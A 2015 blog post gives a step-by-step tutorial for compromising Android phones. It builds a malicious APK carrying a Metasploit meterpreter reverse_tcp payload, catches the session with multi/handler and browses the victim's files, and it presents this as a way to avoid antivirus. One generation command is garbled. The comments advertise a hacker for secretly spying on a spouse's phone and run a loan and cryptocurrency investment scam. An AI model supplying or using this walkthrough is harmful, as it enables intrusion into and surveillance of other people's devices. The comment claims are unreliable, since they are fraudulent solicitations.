Sunday, November 29, 2015

HACKING ANDROID DEVICE EASILY


Hi Friends, Today I am going to teach you how we can compromise an Android Device. Android is becoming much secured and it’s covering all its vulnerabilities. In market there and many Remote Administration Tools available. You came across RATs and how they work, but disadvantage of this tools are they are easily caught by antivirus. Many Antivirus software’s are available for Android device, like 360, Norton etc. So here we are not going to use any Rat, but we are going to make some type of tool which can be compromise the Android.

:: Before Starting ::

We are going to use Kali Linux to create an android app, and one Android Device for Testing. Also we need to update our Metasploit in Kali. Let’s Begin………..

:: Follow the Steps ::

We will start with Kali-Linux.

1} In Kali Linux open two Terminals.

2} In one terminal we will create a Metasploit console by Typing

 msfconsole  

3} In another Terminal we will make malicious app by the following syntax.

 msfconsole android/meterpreter/reverse_tcp lhost=[IP] lport=4444 R > hack.apk 

NOTE:

>> lhost will define the system where it will receive the connection after making the app. And you need IP of the Linux machine you are running  so for IP use this command in another console

 ifconfig  
 you will get IP in 2nd Line (Inet address:………….) Copy that Ip and paste Just after lhost.  

>> R which means exporting the payload in Raw Format next is the Name it can be anything but APK is important because it is the format.

4} So command is there you can create app also you got IP. Now create the malicious App.

:: NOW TESTING THE APP ::

1} Transfer the file to an android device if are on Windows use Bluestacks app Player to install it.

2} Install and Run the app you will get a screen name REVERCE_TCP. Don’t exit the app just keep it in Background. {Internet Connection is Required on Android Device on which u are running the app}

3} Now return to Kali Linux. we opened a Metasploit Console come there.

4} We need access to exploit handler. Type..

use exploit/multi/handler

5} After type exploit so this handler is used to receive connections from external Sources.

When you Run this exploit it’s shows

starting reverse handler
starting Payload.

NOTE:

So already we Installed the app and Opened and kept it in Background. {Internet Connection is Required on Android Device on which u are running the app}.

7} Now you can see that Kali Linux is sending a payload over that app. And waiting for connection. After Few minutes or seconds you can see that meterpreter session is opened.

Once is Session is opened means it’s connected to that Android device successfully now you can exploit it. {HACKED}

In that same terminal. Type

Sysinfo                   //u will get full information of that device//
Help                  //to get the rest of all commands that used to exploit//
Cd/                         //u can access root dir//
Ls                        //u can see that dir, filesys, and script//
Cd sdcard                // travelling to sd card//
Ls                       //again access to the file external storage//

Many others command that can used to exploit get them by help command. You can restart the Android device, Format it.

Enjoy….

2 comments:

  1. Do you need to hack an Android mobile phone? i know of someone who can help.
    Mr James I saw a review about him and I needed help hacking my wifes phone so i contacted him and he said he was going to help me.I gave him the information he required about my wifes phone and after some conversation and few hours later i received all her mobile phone activity linked directly to me. He was reliable and trustworthy i just want to say thank you. If you need help you can contact him via Email(Worldcyberhackers@gmail.com) 


    ReplyDelete
  2. Welcome to the future! Financing made easy with Prof. Mrs. DOROTHY JEAN INVESTMENTS

    Hello, Have you been looking for financing options for your new business plans, Are you seeking for a loan to expand your existing business, Do you find yourself in a bit of trouble with unpaid bills and you don’t know which way to go or where to turn to? Have you been turned down by your banks? MRS. DOROTHY JEAN INVESTMENTS says YES when your banks say NO. Contact us as we offer financial services at a low and affordable interest rate of 2% for long and short term loans. Interested applicants should contact us for further loan acquisition procedures via profdorothyinvestments@gmail.com

    We invest in all profitable projects with cryptocurrencies. I'm here to share an amazing life changing opportunity with you. its called Bitcoin / Forex trading options, Are you interested in earning a consistent income through binary/forex trade? or crypto currency trading. An investment of $100 or $200 can get you a return of $2,840 in 7 days of trading and you get to do this from the comfort of your home/work. It goes on and on The higher the investment, the higher the profits. Your investment is safe and secured and payouts assured 100%. if you wish to know more about investing in Cryptocurrency and earn daily, weekly OR Monthly in trading on bitcoin or any cryptocurrency and want a successful trade without losing Contact MRS.DOROTHY JEAN INVESTMENTS Email profdorothyinvestments@gmail.com


    YOURS IN SERVICE
    Mrs. Dorothy Pilkenton Jean
    Financial Advisor on Bank Instruments,
    Private Banking and Client Services
    Email Address: profdorothyinvestments@gmail.com
    Operation: We provide Financial Service Such As Bank Instrument
    From AA Rate Banks, Cash Loan,BG,SBLC,BOND,PPP,MTN,TRADING,FUNDING MONETIZING etc.

    ReplyDelete